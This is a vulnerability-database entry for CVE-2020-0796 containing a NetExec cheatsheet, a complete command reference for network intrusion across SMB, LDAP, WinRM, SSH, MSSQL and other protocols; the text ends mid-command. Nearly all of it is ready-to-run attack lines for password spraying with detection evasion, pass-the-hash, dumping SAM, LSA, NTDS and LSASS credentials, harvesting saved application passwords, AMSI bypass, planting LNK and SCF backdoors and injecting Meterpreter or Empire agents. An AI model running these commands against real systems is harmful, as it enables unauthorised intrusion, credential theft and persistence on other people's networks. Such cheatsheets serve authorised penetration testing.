{"uuid": "9a2eaadd-b6c8-44b3-867b-c27ce5ebdf1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://gist.github.com/Porkballs/df8b4b4e30522a04debf3644594d1535", "content": "# NXC (NetExec) Cheatsheet\n\nComplete reference for NetExec (NXC) - the network execution tool for pentesting\n\n> **Version Note**: This cheatsheet is based on the latest NetExec version. Always check `nxc --help` and `nxc -L` for your specific version.\n\n## Installation\n```bash\npipx install netexec\n# or\napt install netexec\n```\n\n## Basic Syntax\n\n`nxc -u -p / -H [flags] -M -o `\n\n---\n\n## Protocols Overview\n\n- `smb` - SMB/CIFS (Port 445)\n- `ldap` - LDAP (Port 389/636)\n- `winrm` - WinRM (Port 5985/5986)\n- `ssh` - SSH (Port 22)\n- `rdp` - RDP (Port 3389)\n- `mssql` - Microsoft SQL Server (Port 1433)\n- `ftp` - FTP (Port 21)\n- `wmi` - WMI (Port 135)\n- `vnc` - VNC (Port 5900)\n- `nfs` - NFS (Port 111)\n\n---\n\n## Target Specification\n```bash\nnxc smb 192.168.1.10 # Single host\nnxc smb 192.168.1.0/24 # CIDR range\nnxc smb 192.168.1.1-100 # Range\nnxc smb targets.txt # File with targets (one per line)\n```\n\n---\n\n## Password Spraying\n\n### Pattern: protocol targets.txt users.txt passwords.txt\n\n```bash\n# Domain authentication (default)\nnxc smb targets.txt -u users.txt -p passwords.txt -d DOMAIN\n\n# Local authentication\nnxc smb targets.txt -u users.txt -p passwords.txt --local-auth\n\n# Continue on success (don't stop after first valid)\nnxc smb targets.txt -u users.txt -p passwords.txt --continue-on-success\n\n# Stop on first success per target\nnxc smb targets.txt -u users.txt -p passwords.txt --no-bruteforce\n\n# Single password spray (safer for avoiding lockouts)\nnxc smb targets.txt -u users.txt -p 'Password123!' -d DOMAIN --continue-on-success\n\n# With jitter to avoid detection\nnxc smb targets.txt -u users.txt -p passwords.txt --jitter 5\n\n# Fail limit options\nnxc smb targets.txt -u users.txt -p passwords.txt --gfail-limit 10 # Global fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3 # Per-user fail limit\nnxc smb targets.txt -u users.txt -p passwords.txt --fail-limit 5 # Per-host fail limit\n```\n\n---\n\n## No Authentication\n\n```bash\n# Null session (empty username)\nnxc smb 192.168.1.10 -u '' -p ''\n\n# Guest account\nnxc smb 192.168.1.10 -u 'guest' -p ''\n\n# Anonymous LDAP bind\nnxc ldap 192.168.1.10 -u '' -p ''\n\n# Enumerate without credentials\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt # SMB signing check\n```\n\n---\n\n## Authentication Methods\n\n### Username and Password\n```bash\nnxc smb 192.168.1.10 -u admin -p 'password'\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN\nnxc smb 192.168.1.10 -u admin -p 'password' --local-auth\n```\n\n### Pass-the-Hash\n```bash\nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H \nnxc smb 192.168.1.10 -u admin -H -d DOMAIN\n```\n\n### Kerberos Authentication\n```bash\n# With password\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k\n\n# Using cached ticket (ccache)\nnxc smb 192.168.1.10 -u admin --use-kcache -k\n\n# With AES key\nnxc smb 192.168.1.10 -u admin --aesKey -k\n\n# Specify KDC\nnxc smb 192.168.1.10 -u admin -p 'password' -d DOMAIN -k --kdcHost dc01.domain.local\n```\n\n### Certificate Authentication\n```bash\n# PFX certificate\nnxc smb 192.168.1.10 --pfx-cert cert.pfx --pfx-pass password\n\n# PEM certificate\nnxc smb 192.168.1.10 --pem-cert cert.pem --pem-key key.pem\n```\n\n---\n\n## SMB Protocol (Port 445)\n\n### Basic Enumeration (No Auth)\n```bash\nnxc smb 192.168.1.0/24 # Check SMB version, signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt # Find relay targets\n```\n\n### Enumeration (With Auth)\n```bash\nnxc smb 192.168.1.10 -u user -p pass --shares # List shares\nnxc smb 192.168.1.10 -u user -p pass --shares --filter-shares read,write # Filter by access\nnxc smb 192.168.1.10 -u user -p pass --dir \"C$\" # List directory contents\nnxc smb 192.168.1.10 -u user -p pass --users # Enumerate users\nnxc smb 192.168.1.10 -u user -p pass --users --enabled # Only enabled users\nnxc smb 192.168.1.10 -u user -p pass --users-export out.txt # Export users to file\nnxc smb 192.168.1.10 -u user -p pass --groups # Enumerate groups\nnxc smb 192.168.1.10 -u user -p pass --computers # Enumerate computers\nnxc smb 192.168.1.10 -u user -p pass --local-groups # Local groups\nnxc smb 192.168.1.10 -u user -p pass --pass-pol # Password policy\nnxc smb 192.168.1.10 -u user -p pass --smb-sessions # Active SMB sessions\nnxc smb 192.168.1.10 -u user -p pass --disks # Enumerate disks\nnxc smb 192.168.1.10 -u user -p pass --interfaces # Network interfaces\nnxc smb 192.168.1.10 -u user -p pass --loggedon-users # Logged on users\nnxc smb 192.168.1.10 -u user -p pass --rid-brute # RID cycling\nnxc smb 192.168.1.10 -u user -p pass --qwinsta # RDP connections\nnxc smb 192.168.1.10 -u user -p pass --tasklist # Running processes\n```\n\n### WMI Queries\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc smb 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\" --wmi-namespace \"root\\cimv2\"\n```\n\n### Spidering Shares\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --spider C$\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --spider-folder Users\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --pattern password\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --regex \".*\\.txt$\"\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --content # Search file content\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --depth 3 # Max recursion depth\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --only-files # Files only\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --exclude-dirs Windows,System32\n```\n\n### Command Execution\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -x \"whoami\" # CMD\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable' # PowerShell\nnxc smb 192.168.1.10 -u admin -p pass --exec-method smbexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method atexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method mmcexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --no-output -x \"command\" # Don't retrieve output\n```\n\n### PowerShell Options\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable' --obfs # Obfuscate\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --force-ps32 # Force 32-bit\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --no-encode # Don't encode\nnxc smb 192.168.1.10 -u admin -p pass --clear-obfscripts # Clear cache\n```\n\n### File Operations\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\Windows\\\\Temp\\\\file.txt\" ./local.txt\nnxc smb 192.168.1.10 -u admin -p pass --put-file ./payload.exe \"\\\\Windows\\\\Temp\\\\payload.exe\"\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\file.txt\" ./out.txt --append-host\n```\n\n### Credential Dumping\n```bash\n# SAM Database\nnxc smb 192.168.1.10 -u admin -p pass --sam # Default method\nnxc smb 192.168.1.10 -u admin -p pass --sam secdump # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --sam regdump # Using regdump\n\n# LSA Secrets\nnxc smb 192.168.1.10 -u admin -p pass --lsa # Default method\nnxc smb 192.168.1.10 -u admin -p pass --lsa secdump # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --lsa regdump # Using regdump\n\n# NTDS (Domain Controller)\nnxc smb dc01.domain.local -u admin -p pass --ntds # Default (drsuapi)\nnxc smb dc01.domain.local -u admin -p pass --ntds vss # Using VSS\nnxc smb dc01.domain.local -u admin -p pass --ntds drsuapi # Using drsuapi\nnxc smb dc01.domain.local -u admin -p pass --ntds --user admin # Specific user\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled # Enabled accounts only\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi # Dump DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies # Include cookies\nnxc smb 192.168.1.10 -u admin -p pass --dpapi nosystem # Exclude SYSTEM\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --mkfile masterkeys.txt\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --pvk backupkey.pvk\n\n# SCCM\nnxc smb 192.168.1.10 -u admin -p pass --sccm # Default (wmi)\nnxc smb 192.168.1.10 -u admin -p pass --sccm wmi # Using WMI\nnxc smb 192.168.1.10 -u admin -p pass --sccm disk # Using disk\n```\n\n### SMB Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\n# Vulnerability Checks\nnxc smb 192.168.1.10 -u user -p pass -M ms17-010 # EternalBlue\nnxc smb 192.168.1.10 -u user -p pass -M zerologon # CVE-2020-1472\nnxc smb 192.168.1.10 -u user -p pass -M nopac # CVE-2021-42278/42287\nnxc smb 192.168.1.10 -u user -p pass -M printnightmare # PrintNightmare\nnxc smb 192.168.1.10 -u user -p pass -M remove-mic # CVE-2019-1040\nnxc smb 192.168.1.10 -u user -p pass -M smbghost # CVE-2020-0796\nnxc smb 192.168.1.10 -u user -p pass -M coerce_plus # Coercion vulns\nnxc smb 192.168.1.10 -u user -p pass -M timeroast # Timeroasting\n\n# Enumeration\nnxc smb 192.168.1.10 -u user -p pass -M enum_av # AV products\nnxc smb 192.168.1.10 -u user -p pass -M enum_ca # ADCS CAs\nnxc smb 192.168.1.10 -u user -p pass -M ioxidresolver # Additional interfaces\nnxc smb 192.168.1.10 -u user -p pass -M spooler # Print spooler\nnxc smb 192.168.1.10 -u user -p pass -M webdav # WebClient service\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus # Spider shares\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus -o READ_ONLY=false\n\n# Password Hunting\nnxc smb 192.168.1.10 -u user -p pass -M gpp_password # GPP passwords\nnxc smb 192.168.1.10 -u user -p pass -M gpp_autologin # GPP autologin\n\n# Backdoors\nnxc smb 192.168.1.10 -u user -p pass -M drop-sc # Drop searchConnector\nnxc smb 192.168.1.10 -u user -p pass -M scuffy # Drop .scf files\nnxc smb 192.168.1.10 -u user -p pass -M slinky # Create LNK backdoors\n\n# Computer Management\nnxc smb 192.168.1.10 -u user -p pass -M add-computer # Add/delete computer\nnxc smb 192.168.1.10 -u user -p pass -M backup_operator # Backup operator exploit\n```\n\n#### HIGH PRIVILEGE MODULES (requires admin)\n```bash\n# Credential Dumping\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy # LSASS dump\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump # Alternative LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M procdump # Process dump\nnxc smb 192.168.1.10 -u admin -p pass -M handlekatz # Handle dump\nnxc smb 192.168.1.10 -u admin -p pass -M dpapi_hash # DPAPI masterkeys\nnxc smb 192.168.1.10 -u admin -p pass -M hash_spider # Recursive LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M ntdsutil # NTDS with ntdsutil\n\n# Application Credentials\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover # Find KeePass\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_trigger # KeePass trigger\nnxc smb 192.168.1.10 -u admin -p pass -M mobaxterm # MobaXterm creds\nnxc smb 192.168.1.10 -u admin -p pass -M mremoteng # mRemoteNG creds\nnxc smb 192.168.1.10 -u admin -p pass -M putty # PuTTY keys\nnxc smb 192.168.1.10 -u admin -p pass -M rdcman # RDCMan creds\nnxc smb 192.168.1.10 -u admin -p pass -M winscp # WinSCP creds\nnxc smb 192.168.1.10 -u admin -p pass -M vnc # VNC passwords\nnxc smb 192.168.1.10 -u admin -p pass -M wifi # WiFi passwords\nnxc smb 192.168.1.10 -u admin -p pass -M veeam # Veeam DB creds\nnxc smb 192.168.1.10 -u admin -p pass -M msol # Azure AD Connect\nnxc smb 192.168.1.10 -u admin -p pass -M teams_localdb # Teams SSO cookie\nnxc smb 192.168.1.10 -u admin -p pass -M wam # Token Broker Cache\n\n# Enumeration\nnxc smb 192.168.1.10 -u admin -p pass -M enum_dns # DNS records (WMI)\nnxc smb 192.168.1.10 -u admin -p pass -M get_netconnections # Network connections\nnxc smb 192.168.1.10 -u admin -p pass -M bitlocker # BitLocker status\nnxc smb 192.168.1.10 -u admin -p pass -M hyperv-host # HyperV host\nnxc smb 192.168.1.10 -u admin -p pass -M iis # IIS app pool creds\nnxc smb 192.168.1.10 -u admin -p pass -M install_elevated # AlwaysInstallElevated\nnxc smb 192.168.1.10 -u admin -p pass -M ntlmv1 # NTLMv1 enabled\nnxc smb 192.168.1.10 -u admin -p pass -M runasppl # RunAsPPL status\nnxc smb 192.168.1.10 -u admin -p pass -M uac # UAC status\nnxc smb 192.168.1.10 -u admin -p pass -M wcc # Security config\nnxc smb 192.168.1.10 -u admin -p pass -M security-questions # Security Q&A\n\n# File Operations\nnxc smb 192.168.1.10 -u admin -p pass -M notepad++ # Unsaved files\nnxc smb 192.168.1.10 -u admin -p pass -M powershell_history # PS history\nnxc smb 192.168.1.10 -u admin -p pass -M recent_files # Recent files\nnxc smb 192.168.1.10 -u admin -p pass -M snipped # Snipping Tool\n\n# Persistence & Execution\nnxc smb 192.168.1.10 -u admin -p pass -M empire_exec # Empire agent\nnxc smb 192.168.1.10 -u admin -p pass -M met_inject # Meterpreter\nnxc smb 192.168.1.10 -u admin -p pass -M web_delivery # Web delivery\nnxc smb 192.168.1.10 -u admin -p pass -M impersonate # Token impersonation\nnxc smb 192.168.1.10 -u admin -p pass -M pi # Process injection\nnxc smb 192.168.1.10 -u admin -p pass -M schtask_as # Scheduled task\n\n# Configuration Changes\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable # Enable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable # Disable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M shadowrdp # Shadow RDP\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable # Enable WDigest\nnxc smb 192.168.1.10 -u admin -p pass -M remote-uac # Remote UAC\n\n# Registry Operations\nnxc smb 192.168.1.10 -u admin -p pass -M reg-query # Registry query\nnxc smb 192.168.1.10 -u admin -p pass -M reg-winlogon # Winlogon creds\n\n# Utility\nnxc smb 192.168.1.10 -u admin -p pass -M test_connection # Test connectivity\n```\n\n---\n\n## LDAP Protocol (Port 389/636)\n\n### Basic Enumeration\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users # Enumerate all users\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users user123 # Specific user\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users-export out.txt\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups # Enumerate all groups\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups \"Domain Admins\"\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --computers # Enumerate computers\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --dc-list # List DCs\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --get-sid # Get domain SID\n```\n\n### Advanced Queries\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --admin-count # adminCount=1 users\nnxc ldap 192.168.1.10 -u user -p pass --trusted-for-delegation # Trusted delegation\nnxc ldap 192.168.1.10 -u user -p pass --password-not-required # Empty passwords allowed\nnxc ldap 192.168.1.10 -u user -p pass --active-users # Active accounts only\nnxc ldap 192.168.1.10 -u user -p pass --find-delegation # Delegation relationships\n\n# GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa # Enumerate GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-convert-id gmsa_name\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-decrypt-lsa lsa_data\n\n# Custom LDAP Query\nnxc ldap 192.168.1.10 -u user -p pass --query \"(objectClass=user)\" \"cn,sAMAccountName\"\nnxc ldap 192.168.1.10 -u user -p pass --base-dn \"OU=Users,DC=domain,DC=local\"\n```\n\n### Kerberoasting & ASREPRoasting\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --kerberoasting output.txt\nnxc ldap 192.168.1.10 -u user -p pass --asreproast output.txt\n```\n\n### Bloodhound Collection\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c All\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Default\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c DCOnly\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Session,LoggedOn\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Group,LocalAdmin,ACL\n```\n\n### LDAP Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -M adcs # Find ADCS/PKI\nnxc ldap 192.168.1.10 -u user -p pass -M daclread # Read DACLs\nnxc ldap 192.168.1.10 -u user -p pass -M enum_trusts # Trust relationships\nnxc ldap 192.168.1.10 -u user -p pass -M find-computer # Find computers\nnxc ldap 192.168.1.10 -u user -p pass -M get-desc-users # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M get-network # DNS records/IPs\nnxc ldap 192.168.1.10 -u user -p pass -M get-unixUserPassword # Unix passwords\nnxc ldap 192.168.1.10 -u user -p pass -M get-userPassword # User passwords\nnxc ldap 192.168.1.10 -u user -p pass -M groupmembership # User group membership\nnxc ldap 192.168.1.10 -u user -p pass -M laps # LAPS passwords\nnxc ldap 192.168.1.10 -u user -p pass -M ldap-checker # LDAP signing/binding\nnxc ldap 192.168.1.10 -u user -p pass -M maq # MachineAccountQuota\nnxc ldap 192.168.1.10 -u user -p pass -M obsolete # Obsolete OS\nnxc ldap 192.168.1.10 -u user -p pass -M pre2k # Pre-created accounts\nnxc ldap 192.168.1.10 -u user -p pass -M pso # Password policies\nnxc ldap 192.168.1.10 -u user -p pass -M sccm # SCCM infrastructure\nnxc ldap 192.168.1.10 -u user -p pass -M subnets # Sites and subnets\nnxc ldap 192.168.1.10 -u user -p pass -M user-desc # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M whoami # Current user details\n```\n\n---\n\n## WinRM Protocol (Port 5985/5986)\n\n### Basic Usage\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -H \nnxc winrm 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc winrm 192.168.1.10 -u admin -p pass --local-auth\nnxc winrm 192.168.1.10 -u admin -p pass --laps # LAPS auth\n```\n\n### Port Configuration\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985 # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5986 # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985 5986 # Both ports\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto https # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http https # Both protocols\nnxc winrm 192.168.1.10 -u admin -p pass --http-timeout 15 # Timeout\n```\n\n### Command Execution\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc winrm 192.168.1.10 -u admin -p pass -X '$PSVersionTable'\nnxc winrm 192.168.1.10 -u admin -p pass -x \"ipconfig /all\"\nnxc winrm 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### Credential Dumping\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --sam # Dump SAM\nnxc winrm 192.168.1.10 -u admin -p pass --lsa # Dump LSA\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method cmd # Using cmd\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method powershell # Using PowerShell\n```\n\n### WinRM Modules\n```bash\n# No modules available for WinRM protocol in current version\n```\n\n---\n\n## SSH Protocol (Port 22)\n\n### Authentication\n```bash\nnxc ssh 192.168.1.10 -u root -p password\nnxc ssh 192.168.1.10 -u root -p passwords.txt\nnxc ssh 192.168.1.10 -u root --key-file id_rsa\nnxc ssh 192.168.1.10 -u root --key-file id_rsa -p passphrase\nnxc ssh 192.168.1.10 -u users.txt -p passwords.txt\nnxc ssh 192.168.1.10 -u root -p pass --port 2222\nnxc ssh 192.168.1.10 -u root -p pass --ssh-timeout 20\n```\n\n### Command Execution\n```bash\nnxc ssh 192.168.1.10 -u root -p pass -x \"cat /etc/passwd\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"uname -a\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"id\"\nnxc ssh 192.168.1.10 -u root -p pass --no-output -x \"command\"\n```\n\n### Sudo Operations\n```bash\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check # Check sudo privs\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method sudo-stdin\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method mkfifo\nnxc ssh 192.168.1.10 -u user -p pass --get-output-tries 10\n```\n\n### File Operations\n```bash\nnxc ssh 192.168.1.10 -u root -p pass --put-file local.txt /tmp/remote.txt\nnxc ssh 192.168.1.10 -u root -p pass --get-file /etc/passwd ./passwd.txt\n```\n\n### SSH Modules\n```bash\n# No modules available for SSH protocol in current version\n```\n\n---\n\n## RDP Protocol (Port 3389)\n\n### Check Access\n```bash\nnxc rdp 192.168.1.10 -u admin -p password\nnxc rdp 192.168.1.10 -u admin -H \nnxc rdp 192.168.1.10 -u users.txt -p passwords.txt -d DOMAIN\nnxc rdp 192.168.1.10 -u admin -p pass --local-auth\nnxc rdp 192.168.1.10 -u admin -p pass --port 3390\nnxc rdp 192.168.1.10 -u admin -p pass --rdp-timeout 10\n```\n\n### Screenshots\n```bash\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --screentime 10\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --res 1920x1080\nnxc rdp 192.168.1.10 -u admin -p pass --nla-screenshot # If NLA disabled\n```\n\n### RDP Modules\n```bash\n# No modules available for RDP protocol in current version\n```\n\n---\n\n## MSSQL Protocol (Port 1433)\n\n### Authentication\n```bash\nnxc mssql 192.168.1.10 -u sa -p password\nnxc mssql 192.168.1.10 -u sa -p password --local-auth\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN -k # Kerberos\nnxc mssql 192.168.1.10 -u sa -H \nnxc mssql 192.168.1.10 -u sa -p pass --port 1434\nnxc mssql 192.168.1.10 -u sa -p pass --mssql-timeout 10\n```\n\n### Queries\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT @@version\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.databases\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.server_principals\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"EXEC sp_helprotect\"\n```\n\n### Command Execution\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -x \"whoami\" # via xp_cmdshell\nnxc mssql 192.168.1.10 -u sa -p pass -X 'Get-Host' # PowerShell\nnxc mssql 192.168.1.10 -u sa -p pass --no-output -x \"command\"\n```\n\n### PowerShell Options\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --force-ps32\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --obfs\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --no-encode\nnxc mssql 192.168.1.10 -u sa -p pass --clear-obfscripts\n```\n\n### File Operations\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --put-file local.txt C:\\\\Temp\\\\remote.txt\nnxc mssql 192.168.1.10 -u sa -p pass --get-file C:\\\\Temp\\\\file.txt ./local.txt\n```\n\n### Enumeration\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute # RID bruteforce\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute 5000\n```\n\n### MSSQL Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u user -p pass -M enum_impersonate # Impersonation privs\nnxc mssql 192.168.1.10 -u user -p pass -M enum_logins # SQL logins\nnxc mssql 192.168.1.10 -u user -p pass -M exec_on_link # Execute on linked server\nnxc mssql 192.168.1.10 -u user -p pass -M link_enable_xp # Enable xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M link_xpcmd # Run xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_coerce # Execute arbitrary SQL\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_priv # Enumerate/exploit privs\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -M empire_exec # Empire agent\nnxc mssql 192.168.1.10 -u sa -p pass -M enum_links # Enumerate linked servers\nnxc mssql 192.168.1.10 -u sa -p pass -M met_inject # Meterpreter injection\nnxc mssql 192.168.1.10 -u sa -p pass -M nanodump # LSASS dump\nnxc mssql 192.168.1.10 -u sa -p pass -M test_connection # Test connectivity\nnxc mssql 192.168.1.10 -u sa -p pass -M web_delivery # Web delivery\n```\n\n---\n\n## FTP Protocol (Port 21)\n\n### Authentication\n```bash\nnxc ftp 192.168.1.10 -u admin -p password\nnxc ftp 192.168.1.10 -u anonymous -p ''\nnxc ftp 192.168.1.10 -u users.txt -p passwords.txt\nnxc ftp 192.168.1.10 -u admin -p pass --port 2121\n```\n\n### File Operations\n```bash\nnxc ftp 192.168.1.10 -u admin -p pass --ls # List root\nnxc ftp 192.168.1.10 -u admin -p pass --ls /var/www\nnxc ftp 192.168.1.10 -u admin -p pass --get file.txt\nnxc ftp 192.168.1.10 -u admin -p pass --put local.txt remote.txt\n```\n\n### FTP Modules\n```bash\n# No modules available for FTP protocol in current version\n```\n\n---\n\n## VNC Protocol (Port 5900)\n\n### Authentication\n```bash\nnxc vnc 192.168.1.10 -u admin -p password\nnxc vnc 192.168.1.10 -u admin -p passwords.txt\nnxc vnc 192.168.1.10 -u admin -p pass --port 5901\nnxc vnc 192.168.1.10 -u admin -p pass --vnc-sleep 5 # Rate limiting\n```\n\n### Screenshot\n```bash\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot --screentime 5\n```\n\n### VNC Modules\n```bash\n# No modules available for VNC protocol in current version\n```\n\n---\n\n## NFS Protocol (Port 111)\n\n### Enumeration\n```bash\nnxc nfs 192.168.1.10 # Basic enumeration\nnxc nfs 192.168.1.10 --shares # List shares\nnxc nfs 192.168.1.10 --enum-shares # Enumerate shares (depth 3)\nnxc nfs 192.168.1.10 --enum-shares 5 # Custom depth\nnxc nfs 192.168.1.10 --port 2049\nnxc nfs 192.168.1.10 --nfs-timeout 10\n```\n\n### Share Operations\n```bash\nnxc nfs 192.168.1.10 --share /export --ls # List share root\nnxc nfs 192.168.1.10 --share /export --ls /path/to/dir\nnxc nfs 192.168.1.10 --share /export --get-file remote.txt local.txt\nnxc nfs 192.168.1.10 --share /export --put-file local.txt remote.txt\n```\n\n### NFS Modules\n```bash\n# No modules available for NFS protocol in current version\n```\n\n---\n\n## WMI Protocol (Port 135)\n\n### Basic Usage\n```bash\nnxc wmi 192.168.1.10 -u admin -p password\nnxc wmi 192.168.1.10 -u admin -H \nnxc wmi 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc wmi 192.168.1.10 -u admin -p pass --local-auth\nnxc wmi 192.168.1.10 -u admin -p pass --rpc-timeout 5\n```\n\n### WMI Queries\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_ComputerSystem\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi-namespace \"root\\cimv2\"\n```\n\n### Command Execution\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec-event -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-timeout 10\nnxc wmi 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### WMI Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u user -p pass -M ioxidresolver # Additional interfaces\nnxc wmi 192.168.1.10 -u user -p pass -M spooler # Print spooler\nnxc wmi 192.168.1.10 -u user -p pass -M zerologon # Zerologon check\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -M bitlocker # BitLocker status\nnxc wmi 192.168.1.10 -u admin -p pass -M enum_dns # DNS records\nnxc wmi 